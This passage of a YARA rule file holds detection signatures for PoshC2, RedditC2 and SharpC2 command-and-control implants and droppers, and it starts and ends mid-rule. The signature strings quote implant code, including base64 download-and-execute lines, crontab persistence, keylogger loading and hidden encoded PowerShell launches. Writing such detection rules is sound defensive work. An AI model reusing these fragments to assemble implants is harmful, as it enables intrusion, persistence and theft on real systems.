      $s5  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s6  = "get_PSVariable" fullword ascii
      $s7  = "Sharp_Powershell_Runner" fullword ascii
      $s8  = "InvokeAutomation" fullword ascii
      $s9  = "Microsoft.CodeAnalysis" fullword ascii
      $s10 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s11 = "DllBaseAddress" fullword ascii
      $s12 = "RunspaceInvoke" fullword ascii
      $s13 = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "$o = IEX $c | Out-String" fullword wide
      $s15 = "Program" fullword ascii
      $s16 = "Encoding" fullword ascii
      $s17 = "RefSafetyRulesAttribute" fullword ascii
      $s18 = "  </trustInfo>" fullword ascii
      $s19 = "EmbeddedAttribute" fullword ascii
      $s20 = "baseAddr" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}

rule PoshC2_Dropper {
   meta:
      description = "PoshC2 - dropper.exe"
      sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
   strings:
      $s1  = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s2  = " Type Descriptor'" fullword ascii
      $s3  = "operator co_await" fullword ascii
      $s4  = "operator<=>" fullword ascii
      $s5  = ".data$rs" fullword ascii
      $s6  = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s7  = " Class Hierarchy Descriptor'" fullword ascii
      $s8  = " Base Class Descriptor at (" fullword ascii
      $s9  = " Complete Object Locator'" fullword ascii
      $s10 = "__swift_3" fullword ascii
      $s11 = "__swift_2" fullword ascii
      $s12 = ".rdata$voltmd" fullword ascii
      $s13 = "xWI96tRI" fullword ascii
      $s14 = " delete[]" fullword ascii
      $s15 = "__swift_1" fullword ascii
      $s16 = "vKfffff" fullword ascii
      $s17 = "D$0@8{" fullword ascii
      $s18 = "api-ms-win-core-file-l1-2-4" fullword wide
      $s19 = "api-ms-win-core-file-l1-2-2" fullword wide
      $s20 = " delete" fullword ascii
   condition:
      hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4" or
      pe.sections[4].name == "_RDATA" and
      pe.imports("kernel32.dll", "WriteProcessMemory") and
      pe.imports("kernel32.dll", "CreateRemoteThread") and
      pe.imports("kernel32.dll", "OpenProcess") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      uint16(0) == 0x5a4d and filesize < 300KB and
      8 of them
}

rule PoshC2_DotNet2JS {
   meta:
      description = "PoshC2 - DotNet2JS.js"
      sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
   strings:
      $s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s4 = "AAAAAAAAAAAAAEAAAE" ascii
      $s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB" ascii
      $s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB" ascii
      $s8 = "AAAAAAAAAAD" ascii
      $s9 = "AAAAAAAAAEA" ascii
      $s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD" ascii
      $s11 = "AADAAAABAAAA" ascii
      $s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB" ascii
      $s13 = "ADAAAAA4AA" ascii
      $s14 = "AAAAAAAAAAAAAE4A" ascii
      $s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" ascii
      $s16 = "AABAACAAAEAA" ascii
      $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" ascii
      $s18 = "function dbg(s) {WScript.Echo(s);}" fullword ascii
      $s19 = "var ba = enc.GetBytes_4(b);" fullword ascii
      $s20 = "var length = enc.GetByteCount_2(b);" fullword ascii
   condition:
      hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53" or
      uint16(0) == 0x6176 and filesize < 30KB and
      8 of them
}

rule PoshC2_Stage2core {
   meta:
      description = "PoshC2 - stage2core.so"
      sha256 = "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c"
   strings:
      $x1  = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Read Public" fullword ascii
      $x2  = "SSL - Processing of the ServerKeyExchange handshake message failed" fullword ascii
      $x3  = "Error running command on shell - " fullword ascii
      $x4  = "SSL - Processing of the ClientKeyExchange handshake message failed" fullword ascii
      $s5  = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Calculate Secret" fullword ascii
      $s6  = "SSL - Processing of the compression / decompression failed" fullword ascii
      $s7  = "SSL - Processing of the NewSessionTicket handshake message failed" fullword ascii
      $s8  = "PKCS12 - Given private key password does not allow for correct decryption" fullword ascii
      $s9  = "PKCS5 - Given private key password does not allow for correct decryption" fullword ascii
      $s10 = "PK - Given private key password does not allow for correct decryption" fullword ascii
      $s11 = "PEM - Given private key password does not allow for correct decryption" fullword ascii
      $s12 = "NET - Failed to get an IP address for the given hostname" fullword ascii
      $s13 = "Error reading private key %s - mbedTLS: (-0x%04X) %s" fullword ascii
      $s14 = "PK - Type mismatch, eg attempt to encrypt with an ECDSA key" fullword ascii
      $s15 = "SSL - Processing of the ServerHello handshake message failed" fullword ascii
      $s16 = "RSA - The private key operation failed" fullword ascii
      $s17 = "SSL - Processing of the ChangeCipherSpec handshake message failed" fullword ascii
      $s18 = "SSL - Processing of the Finished handshake message failed" fullword ascii
      $s19 = "RSA - The public key operation failed" fullword ascii
      $s20 = "SSL - Processing of the ServerHelloDone handshake message failed" fullword ascii
   condition:
      hash.sha256(0, filesize) == "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c" or
      uint16(0) == 0x457f and filesize < 4000KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_DropperPs1 {
   meta:
      description = "PoshC2 - dropper.ps1"
      sha256 = "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992"
   strings:
      $s1  = "$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)" fullword ascii
      $s2  = "if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}" fullword ascii
      $s3  = "$procname = (Get-Process -id $pid).ProcessName" fullword ascii
      $s4  = "$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;#REPLACEURLID#\"" fullword ascii
      $s5  = "} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }" fullword ascii
      $s6  = "$getcreds = new-object system.management.automation.PSCredential $username,$PSS;" fullword ascii
      $s7  = "$wc.Headers.Add(\"User-Agent\",\"#REPLACEUSERAGENT#\")" fullword ascii
      $s8  = "$PSS = ConvertTo-SecureString $password -AsPlainText -Force;" fullword ascii
      $s9  = "$wp.Credentials = $getcreds;" fullword ascii
      $s10 = "{$a.Key = [System.Convert]::FromBase64String($key)}" fullword ascii
      $s11 = "if ($username -and $password) {" fullword ascii
      $s12 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" ascii
      $s13 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" ascii
      $s14 = "$d = (Get-Date -Format \"yyyy-MM-dd\");" fullword ascii
      $s15 = "if ($key.getType().Name -eq \"String\")" fullword ascii
      $s16 = "$password = \"#REPLACEPROXYPASS#\"" fullword ascii
      $s17 = "#REPLACEPROXYCOMMAND#" fullword ascii
      $s18 = "$wc = New-Object System.Net.WebClient;" fullword ascii
      $s19 = "$e = $a.CreateEncryptor()" fullword ascii
      $s20 = "elseif($h){$script:s=\"https://$($h)#REPLACECONNECT#\";$script:sc=\"https://$($h)\"}" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992" or
      uint16(0) == 0x5223 and filesize < 10KB and
      8 of them
}

rule PoshC2_DropperPy {
   meta:
      description = "PoshC2 - dropper.py"
      sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
   strings:
      $s1  = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" fullword ascii
      $s2  = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" fullword ascii
      $s3  = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" fullword ascii
      $s4  = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" fullword ascii
      $s5  = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" fullword ascii
      $s6  = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" fullword ascii
      $s7  = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" fullword ascii
      $s8  = "else: r=urllib2.Request(url,headers={'User-agent':ua})" fullword ascii
      $s9  = "hn=socket.gethostname();o=urllib2.build_opener()" fullword ascii
      $s10 = "exec(base64.b64decode(x))" fullword ascii
      $s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" fullword ascii
      $s12 = "ua=\"#REPLACEUSERAGENT#\"" fullword ascii
      $s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" fullword ascii
      $s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" fullword ascii
      $s15 = "serverclean=[#REPLACEHOSTPORT#]" fullword ascii
      $s16 = "pykey=\"#REPLACESPYTHONKEY#\"" fullword ascii
      $s17 = "if pykey in b and pyhash == s and cstr < kdn: " fullword ascii
      $s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" fullword ascii
      $s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" fullword ascii
      $s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" fullword ascii
   condition:
      hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7" or
      uint16(0) == 0x6d69 and filesize < 6KB and
      8 of them
}

rule PoshC2_ImplantCorePy {
   meta:
      description = "PoshC2 - Implant-Core.py"
      sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
   strings:
      $x1  = "  # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" ascii
      $x2  = "  # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/" ascii
      $s3  = "  s.call(\"crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -\" %% filename, shell=True)" fullword ascii
      $s4  = "  modpayload = modb64logger.replace(\"REPLACEME\",filename)" fullword ascii
      $s5  = "  returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" fullword ascii
      $s6  = "  filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" fullword ascii
      $s7  = "  dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" fullword ascii
      $s8  = "            if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" ascii
      $s9  = "  returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" fullword ascii
      $s10 = "                returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" fullword ascii
      $s11 = "  aes = get_encryption(key, iv)" fullword ascii
      $s12 = "      if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" fullword ascii
      $s13 = "  import subprocess as s" fullword ascii
      $s14 = "modules/python/collection/osx/keylogger.py" fullword ascii
      $s15 = "            if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi" ascii
      $s16 = "            postcookie = encrypt(key, taskId).decode(\"utf-8\")" fullword ascii
      $s17 = "  import subprocess" fullword ascii
      $s18 = "  exec(modpayload)" fullword ascii
      $s19 = "  s.call(\"crontab -l | { cat;  } | grep -v '_psh.sh'| crontab -\", shell=True)" fullword ascii
      $s20 = "  modb64logger = base64.b64decode(b64logger)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88" or
      uint16(0) == 0x6d69 and filesize < 40KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_ImplantCoreJS {
   meta:
      description = "PoshC2 - Implant-Core.js"
      sha256 = "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a"
   strings:
      $x1  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/shell.js#L2-L23" fullword ascii
      $x2  = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" ascii
      $x3  = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c" ascii
      $x4  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L116-L124" fullword ascii
      $x5  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js#L115-L132" ascii
      $x6  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L9-L30" fullword ascii
      $x7  = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L70-L74" fullword ascii
      $x8  = "// Pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L2-L7" fullword ascii
      $x9  = "//console.log(\"Running command: \" + command);" fullword ascii
      $x10 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L106-L115" fullword ascii
      $s11 = "        //console.log(\"From Server: \" + readCommandClear);" fullword ascii
      $s12 = "    //console.log(\"host header: \" + h);" fullword ascii
      $s13 = "this.pid = this.procInfo.processIdentifier;" fullword ascii
      $s14 = "//simply run a shell command via doShellScript and return the response" fullword ascii
      $s15 = "response = currentApp.doShellScript(command);" fullword ascii
      $s16 = "    //console.log(\"in shell\");" fullword ascii
      $s17 = "this.procInfo = $.NSProcessInfo.processInfo;" fullword ascii
      $s18 = "this.osVersion = this.procInfo.operatingSystemVersionString.js;" fullword ascii
      $s19 = "    let decryptedData = $.SecTransformExecute(decrypt, Ref());" fullword ascii
      $s20 = "    let encryptedData = $.SecTransformExecute(encrypt, err);" fullword ascii
   condition:
      hash.sha256(0, filesize) == "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a" or
      uint16(0) == 0x2f2f and filesize < 40KB and
      1 of ($x*) and all of them
}

rule PoshC2_ImplantCorePs1 {
   meta:
      description = "PoshC2 - Implant-Core.ps1"
      sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
   strings:
      $x1  = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" fullword ascii
      $s2  = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" fullword ascii
      $s3  = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" ascii
      $s4  = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" fullword ascii
      $s5  = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" fullword ascii
      $s6  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" fullword ascii
      $s7  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" fullword ascii
      $s8  = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" fullword ascii
      $s9  = "$payload = $payloadraw -replace \"`n\", \"\"" fullword ascii
      $s10 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri" ascii
      $s11 = "    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" ascii
      $s12 = "    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte" ascii
      $s13 = "                      $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" fullword ascii
      $s14 = "    $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" ascii
      $s15 = "                                  if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" ascii
      $s16 = "    $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte" ascii
      $s17 = "                                  if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app" ascii
      $s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" fullword ascii
      $s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" fullword ascii
      $s20 = "          if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2" or
      uint16(0) == 0x6b24 and filesize < 40KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_PbindPs1 {
   meta:
      description = "PoshC2 - pbind.ps1"
      sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
   strings:
      $s1  = "                $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" fullword ascii
      $s2  = "        $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" fullword ascii
      $s3  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" fullword ascii
      $s4  = "                    $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" fullword ascii
      $s5  = "                $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" fullword ascii
      $s6  = "                    $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" fullword ascii
      $s7  = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" fullword ascii
      $s8  = "                        if ($decCommand -eq 'KILLPIPE'){exit}" fullword ascii
      $s9  = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" fullword ascii
      $s10 = "                $command = $pipeReader.ReadLine()" fullword ascii
      $s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" fullword ascii
      $s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" fullword ascii
      $s13 = "        $command = $pipeReader.ReadLine()" fullword ascii
      $s14 = "    $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" fullword ascii
      $s15 = "                    $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" fullword ascii
      $s16 = "    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" fullword ascii
      $s17 = "        {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" fullword ascii
      $s18 = "    $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" fullword ascii
      $s19 = "        if ($decCommand -eq 'EXIT') { break }" fullword ascii
      $s20 = "        $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" fullword ascii
   condition:
      hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7" or
      uint16(0) == 0x7566 and filesize < 10KB and
      8 of them
}

rule PoshC2_Shellcode {
   meta:
      description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64"
      sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
      sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
      sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
      sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
      sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
      sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
      sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
      sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
   strings:
      $s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB" ascii
      $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s4 = "ACAAAAAAAAA" ascii
      $s5 = "ABAAAAAAAAA" ascii
      $s6 = "AAAADAAAAA" ascii
      $s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s8 = "AAAABAAAAA" ascii
      $s9 = "AbAAAAAAAc" ascii
      $s10 = "AAAACAAAAA" ascii
      $s11 = "AAAAAAAAAAAAAAAAAAA" ascii
   condition:
      hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e" or
      hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2" or
      hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3" or
      hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9" or
      hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989" or
      hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6" or
      hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019" or
      hash.sha256(0, filesize) == "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9" or
      (((uint16(0) == 0x5654 or uint16(0) == 0x4136) and filesize < 600KB and (8 of them)) or (all of them))
}


- Reddit C2

import "hash"

rule RedditC2_ImplantUNIX {
   meta:
      description = "RedditC2 - implant.py"
      sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32"
   strings:
      $s1  = "    listener_session = subprocess.getoutput('hostname')" fullword ascii
      $s2  = "                    if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" fullword ascii
      $s3  = "    i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" fullword ascii
      $s4  = "    output = subprocess.getoutput(command)" fullword ascii
      $s5  = "    def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" fullword ascii
      $s6  = "def runTask(command):" fullword ascii
      $s7  = "            ciphertext = \"powershell.exe \" + ciphertext[11:]" fullword ascii
      $s8  = "def decrypt(encoded_text, key):" fullword ascii
      $s9  = "                        self.processed_comments.append(top_level_comment.id)" fullword ascii
      $s10 = "        print(\"[+] Received task to execute: \" + ciphertext)" fullword ascii
      $s11 = "        self.processed_comments = []" fullword ascii
      $s12 = "        if(command[:8] == \"download\"):" fullword ascii
      $s13 = "    user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" ascii
      $s14 = "def encrypt(plaintext, key):" fullword ascii
      $s15 = "def xor_encrypt(plaintext, key):" fullword ascii
      $s16 = "    user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" ascii
      $s17 = "        new_comment_body = comment_body.replace('in', 'executed')" fullword ascii
      $s18 = "        self.subreddit.submit(self.listener_name, selftext=postContent)" fullword ascii
      $s19 = "def base64_decode(encoded_text):" fullword ascii
      $s20 = "            output = runTask(command)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" or
      uint16(0) == 0x6d69 and filesize < 20KB and
      8 of them
}

rule RedditC2_ImplantWin {
   meta:
      description = "RedditC2 - RedditAgent.exe"
      sha256 = "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6"
   strings:
      $s1 = "RedditAgent.exe" fullword wide
      $s2 = "set_UseShellExecute" fullword ascii
      $s3 = "[+] Created agent session: " fullword wide
      $s4 = "run hostname" fullword wide
      $s5 = "powershell" fullword wide
      $s6 = "myPassword" fullword wide
      $s7 = "myxorkey" fullword wide
      $s8 = ".NETFramework,Version=v4.7.2" fullword ascii
      $s9 = ".NET Framework 4.7.2" fullword ascii
      $s10 = "E:\\Work\\Analysis\\" fullword ascii
      $s11 = "[+] File uploaded successfully" fullword wide
      $s12 = "createPost" fullword ascii
      $s13 = "encryptedMessage" fullword ascii
      $s14 = "RedditAgent" fullword wide
      $s15 = "SubmitTextPost" fullword ascii
      $s16 = "GetSubreddit" fullword ascii
      $s17 = "postText" fullword ascii
      $s18 = "xorkey" fullword ascii
      $s19 = "listenerID" fullword ascii
      $s20 = "RedditSharp.Things" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}


- SharpC2

import "pe"
import "hash"

rule SharpC2Exe {
   meta:
      description = "SharpC2 - SharpC2.exe"
      sha256 = "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "SharpC2.dll" fullword wide
      $s5  = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\apphost\\standalone\\apphost.pdb" fullword ascii
      $s6  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s7  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s8  = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s' - dialog message: %s" fullword wide
      $s9  = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s10 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s12 = "Could not load 'kernel32.dll': %u" fullword wide
      $s13 = "Download the .NET runtime:" fullword wide
      $s14 = "IsWow64Process2" fullword ascii
